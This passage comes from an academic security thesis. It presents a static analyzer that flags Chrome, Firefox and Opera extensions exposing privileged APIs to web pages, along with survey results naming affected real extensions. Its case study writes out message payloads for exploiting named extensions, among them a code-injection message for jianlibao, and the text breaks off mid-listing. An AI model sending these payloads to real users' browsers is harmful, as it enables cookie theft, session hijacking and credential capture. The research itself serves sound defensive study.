The goal of the static analyzer is to report only extensions that potentially pose a security
and privacy threat, in order to reduce false positives as much as possible, and reduce
the burden of the manual analysis. It is fully written in JavaScript, using various
Node.js packages. We used Esprima [204] and Recast [228] for parsing and manipulating
JavaScript abstract syntax trees (ASTs), and Jsdom [69] for parsing HTML.
Unpack extensions and gather scripts. We crawled extensions using the SlimerJS browser
automation tool [130]. In the extension manifest.json file, background pages are either
declared as a set of script files, or as an HTML file which includes the scripts of the
background page. UI pages are built as HTML pages and are also indicated in the manifest.json
file. The Jsdom HTML parser was used here to extract the scripts embedded in background as
well as UI pages. Static content scripts are directly declared in the manifest.json file.
Background and UI pages can further dynamically inject content scripts into web applica-
tions by calling the tabs.executeScript API. Those were also extracted by analyzing
the AST of background and UI page scripts, and analyzed like other content scripts.
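A minimal sketch of this script-gathering step is shown below; it assumes an unpacked extension directory and omits, for brevity, UI pages and dynamically injected content scripts.

// Sketch: gather the scripts of an unpacked extension from its manifest.json.
const fs = require("fs");
const path = require("path");
const { JSDOM } = require("jsdom");

function gatherScripts(extDir) {
  const manifest = JSON.parse(fs.readFileSync(path.join(extDir, "manifest.json"), "utf8"));
  const scripts = { background: [], contentScripts: [] };
  const bg = manifest.background || {};
  if (bg.scripts) scripts.background.push(...bg.scripts);
  if (bg.page) {
    // Background declared as an HTML page: extract its <script src> references.
    const html = fs.readFileSync(path.join(extDir, bg.page), "utf8");
    const dom = new JSDOM(html);
    for (const s of dom.window.document.querySelectorAll("script[src]")) {
      scripts.background.push(s.getAttribute("src"));
    }
  }
  for (const cs of manifest.content_scripts || []) {
    scripts.contentScripts.push(...(cs.js || []));
  }
  return scripts;  // script paths, relative to the extension directory
}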
Parse scripts and build ASTs. Scripts were parsed with Esprima, resulting in an AST [4]
which contains all JavaScript constructs used in content scripts, background and UI page
scripts. Almost everything in JavaScript is an object [50]. To ease manipulation of the AST,
we additionally built three indexed tables: assignments to variables and object properties
(assignments), function definitions/expressions and object methods (functions), and
function and object method invocations (calls).
Basically, these tables are key/value pairs, in which the keys correspond to the
names of variables, object properties and functions. Each entry was then associated with a
list of all possible values it could resolve to. For assignments, the values were all expressions
assigned to a variable or object. For function definitions and object methods, the values
were the parameters and body of the function. Finally, for function calls, the values
associated to their names in the indexed table were their invocation arguments. The
static analyzer successfully handled functions defined using the bind method, and functions
invoked using the call or apply methods.
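The following sketch illustrates how such indexed tables can be built with Esprima; it is deliberately simplified compared to our analyzer (no scope handling, no support for bind, call or apply).

// Sketch: build indexed tables of assignments, functions and calls for a script.
const esprima = require("esprima");

function indexScript(code) {
  const tables = { assignments: {}, functions: {}, calls: {} };
  const add = (table, key, value) =>
    (tables[table][key] = tables[table][key] || []).push(value);

  // Textual name of an identifier or member expression, e.g. "window.addEventListener".
  function nameOf(node) {
    if (node.type === "Identifier") return node.name;
    if (node.type === "MemberExpression") {
      const prop = node.computed
        ? (node.property.type === "Literal" ? node.property.value : null)
        : node.property.name;
      const obj = nameOf(node.object);
      return obj && prop !== null ? obj + "." + prop : null;
    }
    return null;
  }

  function visit(node) {
    if (!node || typeof node.type !== "string") return;
    if (node.type === "AssignmentExpression") {
      const key = nameOf(node.left);
      if (key) add("assignments", key, node.right);
    } else if (node.type === "FunctionDeclaration" && node.id) {
      add("functions", node.id.name, { params: node.params, body: node.body });
    } else if (node.type === "CallExpression") {
      const key = nameOf(node.callee);
      if (key) add("calls", key, node.arguments);
    }
    for (const k of Object.keys(node)) {           // generic traversal of child nodes
      const child = node[k];
      if (Array.isArray(child)) child.forEach(visit);
      else if (child && typeof child.type === "string") visit(child);
    }
  }

  visit(esprima.parseScript(code));
  return tables;
}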
Event handlers of page message APIs. For each message listener (see Section 2)
in content scripts, background and UI pages, we first looked up the indexed table of
function invocations (calls) to check whether the extension registered listeners for mes-
sages from web applications (for instance, a call to the addEventListener API in content
scripts). In browser contexts, all JavaScript objects are properties of a global object
named window. Different aliases, this, self, global, are sometimes used to refer to
the window object [83,154]. JavaScript object properties can be accessed using the dot
and the array or bracket notations [81]. For the sake of simplicity, we considered the
dot notation and the bracket notation when the property name was a literal (a string).
Considering the global object names (window, top, self, this) and the JavaScript dot
and bracket property accesses, we generated the different ways an API can be invoked.
For instance, addEventListener can be called in 9 different ways: addEventListener,
window.addEventListener, window["addEventListener"], and so on. In general, we
consider that an object can be accessed in 9 different ways, its properties in 18 different
ways, the properties of its properties in 36 ways, and so forth. When we found an invocation
of a communication API in content scripts, background or UI pages, we extracted its
arguments and resolved them as follows.
For addEventListener, the first argument should be the literal message, and the second
argument a function. Otherwise, we use the indexed tables of assignments and functions
to resolve them to the literal message and a function, respectively. Resolving an argument
simply consists in checking whether the indexed table has an entry whose key matches the
argument name, and further checking whether any of its associated values resolves to the
type and value we expect the argument to have. For addEventListener, we expect the first
argument to be a Literal with the value message, and its second argument is expected
to be a function. We follow the same process to extract all message handlers (listeners) in
content scripts, background and UI pages.
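The enumeration of these invocation variants can be sketched as follows; it is a simplified illustration of the generation described above.

// Sketch: enumerate the ways a global API such as addEventListener can be
// referenced, combining global-object aliases with dot and bracket notations.
var GLOBAL_ALIASES = ["window", "top", "self", "this"];

function invocationVariants(apiName) {
  var variants = [apiName];                         // bare call: addEventListener(...)
  GLOBAL_ALIASES.forEach(function(g) {
    variants.push(g + "." + apiName);               // window.addEventListener
    variants.push(g + '["' + apiName + '"]');       // window["addEventListener"]
  });
  return variants;                                  // 1 + 2 * 4 = 9 variants
}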
Sensitive API calls. The handlers (functions) of web application messages in extensions
are parsed to extract all their constructs. If the handlers further call other functions, those
functions are looked up using the indexed table, and their bodies are parsed to also extract
their constructs. Finally, the constructs are analyzed to decide whether the extension
potentially poses any of the security and privacy threats considered in this work.
— An extension is flagged as potentially executing arbitrary code sent from web applica-
tions if it invokes functions like eval (in any part of the extension) or tabs.executeScript
(in background and UI pages).
— An extension is flagged as potentially allowing web applications to bypass the SOP if
its constructs include APIs that can be used to make AJAX calls. This includes the
creation of new XMLHttpRequest objects, calls to the fetch API, or any AJAX-specific
API provided by popular third-party libraries such as jQuery and AngularJS ($.get,
$.ajax, $.post, $http.get, $http.post).
— If the constructs include invocations of storage APIs such as storage.local.set,
storage.local.get, storage.sync.set or storage.sync.get, then the extension is
flagged as potentially storing/retrieving data for web applications.
— An extension is considered as potentially leaking user cookies, history, bookmarks,
and list of extensions to web applications if either of the following invocations were
found in their message handlers constructs: cookies.getAll, history.search,
history.getVisits, bookmarks.getTree, management.getAll, and related APIs.
— Finally, an extension is considered as potentially allowing web applications to download
and save files on the user’s device if its message handler constructs
include an invocation of downloads.download.
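These flagging rules can be summarized as a lookup from API name patterns to threat categories, sketched below with a condensed, non-exhaustive rule list.

// Sketch: map sensitive API names found in message handler constructs to the
// threats of Section 2.2 (condensed, non-exhaustive rule list).
var THREAT_RULES = [
  { threat: "Execute code",      apis: ["eval", "tabs.executeScript"] },
  { threat: "Bypass SOP",        apis: ["XMLHttpRequest", "fetch", "$.ajax", "$.get", "$.post"] },
  { threat: "Store data",        apis: ["storage.local.set", "storage.local.get",
                                        "storage.sync.set", "storage.sync.get"] },
  { threat: "Read cookies",      apis: ["cookies.getAll"] },
  { threat: "Read history",      apis: ["history.search", "history.getVisits"] },
  { threat: "Read bookmarks",    apis: ["bookmarks.getTree"] },
  { threat: "List extensions",   apis: ["management.getAll"] },
  { threat: "Trigger downloads", apis: ["downloads.download"] }
];

// `calls` is the list of API names found in a handler and its dependencies.
function threatsOf(calls) {
  return THREAT_RULES
    .filter(function(rule) {
      return rule.apis.some(function(api) {
        return calls.some(function(c) { return c.endsWith(api); });
      });
    })
    .map(function(rule) { return rule.threat; });
}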
It is worth mentioning the case of content scripts forwarding messages to background
pages. When this is the case, the constructs of the background page handlers for content
script messages are also analyzed, looking for calls to any API that potentially poses
security and privacy threats. In fact, content scripts only have access to the host and
storage capabilities. When they need access to more capabilities, they can send messages
to the background page, which may then give them access to the related capability. Con-
tent scripts can forward messages they receive from web applications to the background
page. The latter handles the message and responds to the content script, which in turn
responds to the application. This is particularly relevant in Firefox, which does not allow
direct communications between web applications and background pages. Nonetheless, we have
observed many content scripts forwarding messages to background pages, even to access
APIs they can directly use from their own context.
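As an illustration of this forwarding pattern, the hypothetical vulnerable extension sketched below relays page messages to its background page, which answers with the user's cookies; this is the kind of code our analyzer flags.

// Hypothetical vulnerable extension illustrating the forwarding pattern.
// Content script: relay a page message to the background page and forward
// the background page's answer back to the web page.
window.addEventListener("message", function(event) {
  if (event.source !== window || !event.data || event.data.type !== "get-cookies") return;
  chrome.runtime.sendMessage(event.data, function(response) {
    window.postMessage({ type: "cookies-response", cookies: response }, "*");
  });
});

// Background page: handle the relayed message with a privileged API.
chrome.runtime.onMessage.addListener(function(message, sender, sendResponse) {
  if (message && message.type === "get-cookies") {
    chrome.cookies.getAll({ domain: message.domain }, sendResponse);
    return true;  // keep the channel open for the asynchronous response
  }
});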
3.2 Manual Analysis
The goal of the manual analysis was to confirm the suspicions of the static analyzer and to
build the precise signatures of the messages that have to be sent by web applications to exploit
extensions’ capabilities. Extensions reported for manual analysis were unpacked in the
browser using the CRX Extension Viewer [277]. We inspected their message handlers. If
the suspicion was confirmed, we built the signature of the messages that the extension
accepts to handle. We also identified the web applications from which the messages have
to be sent, and the targets of those messages in the case of SOP bypass.
Then we installed the extension, navigated to the appropriate web
applications, interacted with the extension by sending messages from the browser
console [17], and validated that the extension successfully replied with the requested in-
formation. For some extensions, we patched their code with hooks in the message handlers,
installed them again (in developer mode) and interacted with them to validate the results.
3.3 Limitations
Our static analysis tool suffers from several limitations. The first one is that we did
not consider scopes [83], which leads to unnecessary functions being analyzed. Ultimately,
this is not a problem, because all the results were further manually reviewed
to remove false positives. The tool also suffers from some false negatives, mainly because
the flexibility of JavaScript makes it challenging to exhaustively cover all the ways
message listeners can be registered in extensions. Finally, for a few extensions, despite all our
efforts at the static and manual analysis levels, we could not draw any conclusion about
the potential threats they may pose.
Note also that we considered only scripts that are part of the extension packages. For
instance, background and UI pages may reference external scripts; those scripts were not
considered in our analysis. Nonetheless, we think that extension bundles are likely
to contain most of the APIs that we consider in this work, as extension developers are
advised to avoid referencing remote scripts in extension code.
4 Empirical Study
We downloaded Chrome [24], Opera [108], and Firefox [58] extensions by the end of Novem-
ber 2017. The extensions were statically analyzed at the beginning of February 2018, on
a cluster of 200 nodes, mainly because of storage limitations on our own devices. This was
preceded by a long period of tests during which we improved the static analyzer and fixed
the list of security and privacy threats. In the middle of May 2018, we did another crawl
and analysis. The results presented here are for this second dataset.
In this section, we first give an overview of the results, then we discuss each threat in more
detail and report the extensions where it was found.
4.1 Overview
Table 8.1 presents the number of extensions we collected and analyzed. Chrome provides
the largest share of extensions, followed by Firefox and Opera. Recall that for Firefox,
we are considering only extensions built using the new WebExtensions API [156], and not
those using the XPCOM/XUL API [100].
The static analysis tool reported 3,996 suspicious extensions that we manually vetted. The
results of the manual analysis are also shown in Table 8.1. As with the share of extensions,
Chrome had the largest share of extensions with threats. Out of a total of 197 extensions, only
16 were found on Firefox, 10 on Opera, and the remaining 171 are Chrome extensions. Note
that a single extension may pose more than one threat at a time. All 197 extensions
reported here effectively pose at least one of the security and privacy threats
described in Section 2. During the manual analysis, we also identified the messages to be
sent in order to exploit their capabilities. To ease readability, the full list of the extensions
and the threats that they pose is given in Table A.7 in the Appendix.
Table 8.1 – Data overview
Chrome Firefox Opera Total
Extensions analyzed 66,401 9,391 2,523 78,315
Suspicious extensions 3,303 483 210 3,996
Execute Code 15 2 2 19
Bypass SOP 48 9 6 63
Read Cookies 8 - - 8
Read History 40 - - 40
Read Bookmarks 37 1 - 38
Get Extensions Installed 33 - - 33
Store/Retrieve Data 85 2 3 90
Trigger Downloads 29 5 2 36
Total of unique extensions 171 16 10 197
Extensions installs and categories Figure 8.3 presents the distribution of impacted users, that is, the number of installs per extension at the time of writing this thesis. Around 55% of the extensions have fewer than 1,000 users, while the remaining 45% have thousands of installs, showing that these threats are present in rather popular extensions and hence affect many users. About 27% of extensions have fewer than 100 users and another 27% have between 100 and 1,000 users. We see this as an opportunity for a tool such as ours to help improve extension security, as it can serve to detect potentially malicious extensions while they are not yet very popular, thereby limiting their impact on users.
Table 8.2 further presents the categories of these extensions. Note that Chrome, Firefox and Opera do not categorize extensions in the same way: some categories exist only on specific browsers and not on others. Moreover, we found similar (or identical) extensions classified differently depending on the browser. We merged the different categories whenever possible.
As one can observe, Productivity is the most popular category among the reported extensions. It is also the most popular category among all the Chrome and Opera extensions we downloaded, as well as in various datasets from recent
studies [245,259,260]. This category does not exist on Firefox.
We were surprised that only 15 extensions (7.61%) are classified as Developer Tools. Considering the severity of the threats, we expected most of them to be extensions provided for developers to perform controlled experiments. Since our results represent only a lower bound on the number of extensions potentially posing these risks, it would not be surprising if even more extensions exhibited similar threats.
Figure 8.3 – Distribution of the number of users per extension (install-count bins: 0-100, 101-1000, 1001-10000, 10001-100000, 100001+)
Table 8.2 – Category of extensions
Category # Extensions
Productivity 81
Social & Communication 48
Fun 19
Accessibility 17
Developer Tools 15
Search Tools 6
Shopping 4
Blogging 2
Privacy & Security 2
Other 2
Appearance 1
Total 197
Extensions privilege only some web applications About 55 extensions (45, 7 and 3 on Chrome, Firefox and Opera respectively) communicate with any web application, giving it access to their privileged APIs. Interestingly, on Chrome, 7 of them allow arbitrary code execution in the extension context, 15 are concerned with SOP bypass, 26 with storing data, 2 can be exploited by any web application to read all user cookies, and 5 to read the cookies of the current web application.
The vast remainder of the extensions (72.08%) can be exploited only by specific web applications wishing to benefit from their privileged capabilities. For instance, reading the user's browsing history, bookmarks and list of installed extensions is enabled by extensions only for specific applications such as fliptab.io, atavi.com and mail.google.com. In particular, downloads are allowed by many extensions (on Chrome and Opera), mostly from vk.com.
The fact that most extensions allow communications with only some specific applications can also be explained by the fact that most of those we found allow web applications to interact with the background pages directly, and it is only possible to allow communications between background pages and specific web applications (not all of them).
Extensions allow connections to arbitrary web applications While many extensions privilege specific web applications, as shown previously, the exact opposite is observed regarding the hosts that extensions allow web applications to connect to in order to access user data. For example, 37 out of the 48 extensions that can be used to bypass SOP on Chrome give access to the user's data on any other application. On Firefox, 6 out of the 9 extensions allow access to the data of any web application.
These two observations (extensions mostly give access to their privileged APIs only to some web applications, yet allow them to access any other web application's data in the case of SOP bypass) suggest that the access they give to their capabilities is rather deliberate. Moreover, for the majority of extensions, the messages to send in order to exploit their APIs are so trivial that the exposure could only have been deliberate (see Section 6).
Most privileged web applications As already mentioned, most extensions let specific applications benefit from their privileged APIs. This is the case, for instance, of fliptab.io, whose scripts can communicate with 31 very similar HD wallpaper extensions on Chrome, each with hundreds to thousands of users. The domain vk.com can interact with 19 extensions (17 on Chrome and 2 on Opera), mostly to download files on the user's device. The domain atavi.com can access the user's history, most visited websites (topsites) and bookmarks thanks to 6 extensions.
Extensions which pose more than one threat All the extensions reported here pose at least one of the security and privacy threats considered in this work. Nonetheless, some extensions pose several threats.
The eRail.in [51] extension on Chrome gives access to all user cookies and allows full SOP bypass from any web application. Moreover, it has more than 400k users. Interestingly, a version of the extension exists on Firefox, but it leaks the cookies and data of a limited set of web applications (all related to the extension owner's domain) only to the extension provider's own domains. Five extensions provided by Fabasoft (see Table A.4 in the Appendix) leak the current tab's cookies. As such, they allow attackers to access even HTTPOnly cookies and use them to mount session hijacking attacks.
Ringostat dialer [123] is the only extension that executes arbitrary code sent from app.ringostat.com directly in its background page. All other extensions execute the attacker's code in the context of their content scripts. Recall that the background page has access to all the capabilities an extension declares. Interestingly, this extension has the host, storage, cookies, and tabs permissions, meaning that any script present on app.ringostat.com can access user data on any other domain, access the extension storage and cookies, open new tabs, inject code directly in any tab, etc.
StartHQ [132] also allows SOP bypass from starthq.com and leaks user browsing history. Similarly, SalesforceIQ CRM [124] allows SOP bypass and leaks the list of installed extensions to mail.google.com and salesforceiq.com.
Finally, user browsing history, bookmarks and installed extensions can be read by an attacker on atavi.com and *.fliptab.io thanks to 6 and 31 extensions respectively (see the full list in the Appendix). The latter also let fliptab.io store and retrieve data in the extension storage.
Cross-browser extensions It is worth mentioning that most of the extensions we found on Opera and Firefox were also present on Chrome. While the compatibility of extension APIs across major browsers [2,25,100,110] lets developers reach more users, it also widens the attack surface, because a single cross-browser extension can impact more users. For instance, we noticed that megatest2016, an extension provider, had 2 extensions on Chrome and a very similar one on Opera. At the time of writing this thesis, Chrome had removed the 2 extensions (they allowed ok.ru and other applications to bypass SOP, although we do not know whether their removal was due to the SOP bypass), while on Opera a similar extension is still available as MegaTest [92]. The Photo Zoom for Facebook and Facebook Photo Zoom Firefox add-ons have similar versions on Chrome, but these do not allow SOP bypass. Similarly, the ModernDeck extension is present both on Opera [98] and Chrome [97]. On Opera, it allows data to be stored and retrieved, while on Chrome it does not. This represents yet another problem of cross-browser extensions: while users of an extension suffer from security and privacy threats on one browser, users on another browser, where the extension has been removed or fixed, do not. Browser vendors, and more importantly users, would benefit from a security and privacy perspective if vendors shared their extension reviews with one another, helping them take similar actions such as removing extensions or updating them to remove the threats they pose.
4.2 Execute code
Extensions execute in browsers with elevated privileges. From an attacker's perspective, being able to execute arbitrary code in an extension context also gives access to the extension's capabilities. We found 15 extensions on Chrome, 2 on Firefox and 2 on Opera that can be exploited by web applications to execute code in their privileged context. Only one extension on Chrome, Ringostat dialer [123], executes code it receives from app.ringostat.com in its background page. It thereby gives access to user data on any application and to user cookies, and allows code injection in any tab the user opens, the use of the extension storage, etc. All other extensions execute the attacker's code in the context of their content scripts. Even though content scripts have limited access to extension capabilities, they are not subject to SOP, can store and retrieve data, and, more importantly, have access to the full DOM of the web application pages in which they are injected.
The iwassa extension, present on Opera [79] and Chrome [78], allows any application to open any URL in a new tab and execute arbitrary code (as a content script) in it. While code in the context of a content script can already access any application's data, one can further inject specific content into the DOM of the newly opened tabs, for instance to exfiltrate any token or secret present in the application's DOM. In fact, in addition to cookies, many sensitive applications use tokens to perform additional checks on the origins of requests before letting users perform sensitive actions on their data.
Another interesting example is the LinkClicker extension, also present on Opera [88] and Chrome [87]. It allows any application to send code that will be injected into any new tab the user opens during the current browsing session. One can use it to track the user while she browses, gather any credentials she provides to log into any application, and exfiltrate them to the attacker.
In many of these cases, the problem is that the extension does not correctly sanitize the code received from web applications, allowing attackers to execute arbitrary code. A good example is the GureTV: To watch television extension on Firefox [67]. It did sanitize content sent by web applications, but not content sent from iframes embedded in those applications. Hence, one can create an iframe and send arbitrary code, which will be executed in the context of the content scripts.
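The sketch below is a hypothetical reconstruction of this bug class (it is not the actual code of the extension): messages originating from the embedding page are sanitized, while messages posted by iframes are trusted as-is.

// Hypothetical reconstruction of the bug class (not the extension's actual code).
function sanitize(data) {
  // Placeholder sanitization: drop any field that looks like code.
  var copy = Object.assign({}, data);
  delete copy.code;
  return copy;
}
function handleMessage(data) {
  // Placeholder standing in for the extension's real message handling.
  console.log("handling", data);
}
window.addEventListener("message", function (event) {
  if (event.source === window) {
    handleMessage(sanitize(event.data));  // messages from the page: sanitized
  } else {
    handleMessage(event.data);            // messages from iframes: trusted as-is
  }
});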
Many of the other extensions work similarly and allow (at least) access to arbitrary user data on any application, and/or the storage and retrieval of data (when they have the appropriate permissions).
4.3 Bypass SOP
Extensions are not subject to the SOP and therefore have access to user data on any web application for which they have declared the host permission. Through message exchanges with extensions, 48, 9 and 6 extensions on Chrome, Firefox and Opera respectively allow web applications to bypass SOP by accessing user data on any other web application. As for the other threats, the trend is to allow only some web applications to bypass SOP, even though 15 of these Chrome extensions allow any application to access any other application's data. Hence, the majority of arbitrary SOP bypasses can be exploited by specific web applications, including ok.ru, mail.google.com, logincat.com, etc. Interestingly, when SOP bypass is possible, in most cases the data of all domains can be accessed. On Chrome, for instance, 37 out of the 48 extensions allow access to any application's data. Even when the SOP bypass is partial, it is granted to rather sensitive domains. For instance, 5 extensions out of 11 allow SOP bypass towards users' Google accounts: salesmate.io, appspot.com and aliexpress.com can access users' Gmail accounts. One extension [89] allows access to the linkedin.com data of more than 400k users from Gmail, and blog.renren.com can access github.com [120].
4.4 Cookies
We found 8 Chrome extensions that can be exploited by web applications to read user cookies: 2 of them allow any web application to read all user cookies [51,133], 1 allows only app.ringostat.com [123] to read all user cookies, and the other 5 allow an attacker script to read the cookies of the tab in which it executes. The number of users affected is substantial (more than 415k for eRail.in [51], 9.6k for Telerik Test Studio Chrome Playback 2014.1 [133] and 78 for Ringostat dialer [123]). Cookies can be used to hijack users' browsing sessions, access their data and take actions on their behalf. It is worth mentioning that the three extensions that can be exploited to read all user cookies were probably poorly programmed: the ability to read cookies was most likely meant to be used from specific web applications, but the implementation allows other web applications to also get access to user cookies.
In particular, the Ringostat dialer [123] extension does not expose any explicit means to get user cookies, but it executes any code sent from app.ringostat.com in the extension's background page context (using the eval function), giving that application access to all the capabilities of the extension. Among those are the cookies, storage and arbitrary host permissions, and the ability to open tabs and inject and execute arbitrary code in them.
We found that the web application https://erail.in/ effectively reads all user cookies when the eRail.in [51] Chrome extension is installed. This means that the extension intentionally gives https://erail.in access to user cookies. However, it is not clear whether only the cookies of https://erail.in/ were meant to be leaked, or any cookie. In practice, any web application can access all user cookies stored by any other web application and use them to hijack user sessions. Interestingly, the extension has a version on Firefox, where the cookies leaked are only those of domains related to erail.in, and they are leaked only to erail.in and eair.in.
The case of the Telerik Test Studio Chrome Playback 2014.1 [133] extension is particularly interesting, as one has to set up complex interactions involving the extension's content scripts and background page, as well as the application and its server. In particular, the interactions are triggered from the web application, but the cookies are sent to the application's server instead of being returned directly to the application. Following the same mechanism, one can clear cookies, delete the user's browsing history, etc. A similar extension, progress-test-studio-extension, is also available on Firefox. Unfortunately, we could not analyze it, as it failed to download.
Finally, 5 Fabasoft extensions (see Table A.4 in the Appendix for details) allow the attacker to read the current tab's cookies on any web application. Even when a web application protects its cookies with the HTTPOnly flag [74], an attacker script running
in the web application bypasses this protection by obtaining the cookies via the extension.
It can further use them to mount session hijacking attacks against the user.
4.5 Downloads
Exploiting extensions to trigger the download of arbitrary files is enabled mainly from specific applications, including vk.com (see Table A.2 in the Appendix) and ok.ru. Only 2 extensions on Chrome and 3 on Firefox allow downloads from arbitrary web applications. The main purpose of the related extensions was to allow the download of music and videos; sometimes they would even suffix the downloaded file name with .mp3 or .mp4. Nonetheless, we have been able to exploit these extensions to trigger the download of arbitrary files and save them on the user's device. An attacker can use this to download malicious software which, when inadvertently executed by the user, may allow the attacker to take control of their computer and perform malicious actions.
It is worth mentioning that none of these extensions required user action to trigger the downloads. One of them, multiDownloader [101], even overwrites a file if it is already present on the user's device.
The case of the Chrome repl.it download extension [121] is also worth mentioning. It is a helper extension for the https://repl.it application, used for creating and running programs in different languages online, and it allows saving the code being created. Even though the extension prompts the user to confirm the file name (the default is program.), the content of the file can be fully arbitrary. As such, an attacker can trick the user into thinking she is saving the code being edited, while completely different content is saved.
4.6 History, bookmarks, and list of installed extensions
Two providers distinguish themselves with regard to extensions that can be exploited to access the user's browsing history, bookmarks and list of installed extensions. On Chrome, fliptab.io [68] provides 31 very similar HD wallpaper extensions (see the full list in the Appendix) and allows fliptab.io to get all browsing history, bookmarks and the list of installed extensions. Each of these extensions has between a hundred and 25k users. Furthermore, six extensions provided by atavi.com grant the same privileges to pages at atavi.com and atavi.test. One of them, Atavi - bookmark manager [13], has more than 96k users.
Additionally, Browser History [18] leaks the user's browsing history to www.americaninternetmatrix.com/history. Finally, StartHQ [132] leaks browsing history to https://starthq.com. Other extensions that give access to the list of installed extensions include Boomerang for Gmail [15] (with more than 1.5 million users), to mail.google.com, and SalesforceIQ CRM [124], to mail.google.com and salesforceiq.com.
4.7 Store/retrieve data
About 85 extensions can be exploited by various web applications to store and retrieve data. On Chrome, 26 of these extensions give any application access to their storage; the others give specific applications access to it. For instance, fliptab.io can store data in the user's browser thanks to its 31 extensions. The domain netflix.com is also able to store data thanks to 3 extensions, and mail.google.com thanks to 2 extensions. The extensions ISOGG Y-Tree AddOn [77] and PhyloTreeMT AddOn [114] are from the same provider, even though the web applications they allow to persist data are isogg.org and phylotree.org respectively.
Recall that extension storage is persistent and not affected by the clearing of browsing data (web application cookies, storage, etc.). As such, it represents a resilient storage which can be used to bypass users' privacy preferences and uniquely identify them even after they have cleared their cookies. Interestingly, some extensions propose to sync the data they store across all the devices the user is logged into. For instance, if a user logs into multiple devices with the same extension installed, syncing storage lets an application track her across all her devices.
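As a minimal sketch of how trivially such resilient, synced storage can be abused, an extension's background script could persist an identifier as follows (the key name and identifier generation are illustrative):

// Sketch: a background script persisting an identifier in chrome.storage.sync.
// The value survives the clearing of cookies and site data, and is replicated
// on every device where the user is signed into the browser.
chrome.storage.sync.get("trackingId", function (items) {
  if (!items.trackingId) {
    var id = Math.random().toString(36).slice(2); // illustrative identifier
    chrome.storage.sync.set({ trackingId: id });
  }
});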
4.8 Other threats
For SOP bypass, we have reported here the cases where web applications can access arbitrary data on other web applications. Nonetheless, we found many extensions allowing access to some predefined data of other web applications. This also represents a SOP bypass, since web applications cannot access such data with their normal privileges. Finally, we found some Opera and Chrome extensions (like the 31 HD wallpaper extensions by fliptab.io, and others not reported here) which allow web applications to clear user browsing data including cookies (or even set/get the cookies of some specific domains), history, bookmarks, cache and stored passwords, or to enable, disable or uninstall extensions. We do not include such cases in this thesis.
5 Tool for analyzing message passing APIs
We provide online, at https://swexts.000webhostapp.com/extsanalyzer/, a tool for analyzing the message passing APIs of extensions. The only difference with the version used in this work is that, for simplicity, it does not handle dynamically injected content scripts. That notwithstanding, in order to analyze dynamic content scripts, one can simply declare them in the extension manifest as static content scripts.
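For instance, assuming the dynamically injected script lives in a file named dynamic-script.js, adding a manifest entry such as the following declares it as a static content script:

"content_scripts": [
  {
    "matches": ["<all_urls>"],
    "js": ["dynamic-script.js"]
  }
]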
Listing 8.1 shows the result produced by the tool when applied to the eRail.in Chrome
extension [51].
{
  "com_via_cs": {
    "to_back": {
      "back": {
        "ajax": {
          "$.get": "",
          "$.post": "",
          "$.ajax": "",
          "XMLHttpRequest": ""
        },
        "cookies": {
          "chrome.cookies.getAll": "",
          "chrome.cookies.remove": "",
          "cookies": ""
        }
      }
    }
  }
}
Listing 8.1 – Result of analyzing the erail.in extension
— com_via_cs indicates that webpages can communicate with the extension via its content scripts, using the postMessage API. This extension has only one content script; when there are multiple content scripts, the tool analyzes each of them independently and produces results for each.
— to_back indicates that the messages sent by webpages to the content script are forwarded to the extension background page.
— The tool found that two sensitive APIs are reachable in the background page: AJAX requests, with calls to the jQuery AJAX APIs ($.get, $.post, $.ajax), and access to cookies, with invocations of the chrome.cookies.getAll and chrome.cookies.remove APIs.
The main goal of the tool is to raise awareness about the fact that an attacker may potentially get access to an extension's privileged APIs. One can then further review the code to validate or refute the tool's results. For instance, after manually vetting the code of the eRail.in extension, we confirmed that any webpage can access all user cookies and make AJAX requests to any domain. See Section 6 for more details and examples of the messages to send to extensions in order to benefit from their privileged capabilities.
There is room for further improving the tool. Lessons can be learnt from state-of-the-art JavaScript static analysis tools in order to improve the extraction of message passing listeners and the tracking of how messages escalate to calls to extensions' sensitive APIs. The set of threats considered in this work can also be extended with extension threats described in the literature. Finally, our ultimate goal is to make the tool usable by everybody: given the name of a Chrome, Firefox or Opera extension, the tool would automatically download and analyze it for the different threats, and output a score as well as a non-technical explanation of the potential threats the extension may pose. For extensions that have been manually vetted (such as the ones found in our empirical study), the tool can therefore provide a precise report about the threats they pose and warn the user about whether the extension is malicious, and thus whether it is safe to install.
6 Case study
In this section, we show how an attacker can exploit the capabilities of an extension by sending the appropriate messages. In order to gain access to privileged browser features via an extension, an attacker first needs to ensure that the extension is installed and enabled. Many recent studies discussed extension discovery, using for instance their unique identifiers and web accessible resources [245,249], or the DOM-specific changes they introduce in web pages [260]. This is not really needed here: knowing the structure of the messages an extension responds to is sufficient, since if the extension is present, it will reply. To benefit from an extension's capabilities, it is sufficient that the attacker has a script in a web application with which the extension can interact. We recorded videos demonstrating some extensions and the threats discussed in this study. They are accessible at https://swexts.000webhostapp.com/extensions/.
6.1 Example of messages to send to extensions
We refer to Section 2, which presents the message passing APIs between webpages and the different components of an extension. We illustrate each threat with at least one extension.
Execute code in content scripts context Listing 8.2 presents the structure of messages that can be sent from any webpage to the jianlibao [84] Chrome extension to execute
arbitrary code in the context of its content scripts. Replace CODE with real JavaScript code, then serialize the message using JSON.stringify before sending it. The extension has the storage and host permissions, meaning that any page can bypass SOP and get access to user data on any domain, and store data in the extension storage and later retrieve it for tracking purposes. Moreover, the code is injected in the active tab the user is interacting with. As the user may switch tabs at any time, one can send the code regularly (say, every second) to ensure that it is injected in all the web applications the user interacts with. Since content scripts have access to the DOM of webpages, the injected code also has full access to the active tab's DOM, giving it the ability to undertake any action: recording user names and passwords, credit card numbers, emails, etc.
{
  type: "getResumeInfo",
  downloadObj: {
    resumeWhereabouts: 5
  },
  context: {
    contentScript: CODE,
    jsMethod: "console.log"
  }
}
Listing 8.2 – Executing arbitrary code in the context of the content scripts of the
current tab the user navigates to, thanks to the jianlibao Chrome extension.
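Concretely, such a message could be sent from any page as sketched below; the payload mirrors Listing 8.2, and the value assigned to CODE is a harmless placeholder.

// Sketch: serialize the message of Listing 8.2 and post it to the page, where
// the extension's content script listens for it.
var CODE = "console.log('injected');"; // harmless placeholder for attacker code
var msg = {
  type: "getResumeInfo",
  downloadObj: { resumeWhereabouts: 5 },
  context: { contentScript: CODE, jsMethod: "console.log" }
};
window.postMessage(JSON.stringify(msg), "*");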
Extensions such as iwassa [78,79] or LinkClicker [87,88], present on Chrome and Opera, even allow sending a URL along with code. They will open the URL in a new tab and execute the code in the context of the content scripts injected by the extension in that tab. Listing 8.3 presents the case of the iwassa extension: replace URL with the URL of the page to open in a new tab, and CODE with the code to be executed in the context of the new tab's content scripts.
{
  from: "logininfo",
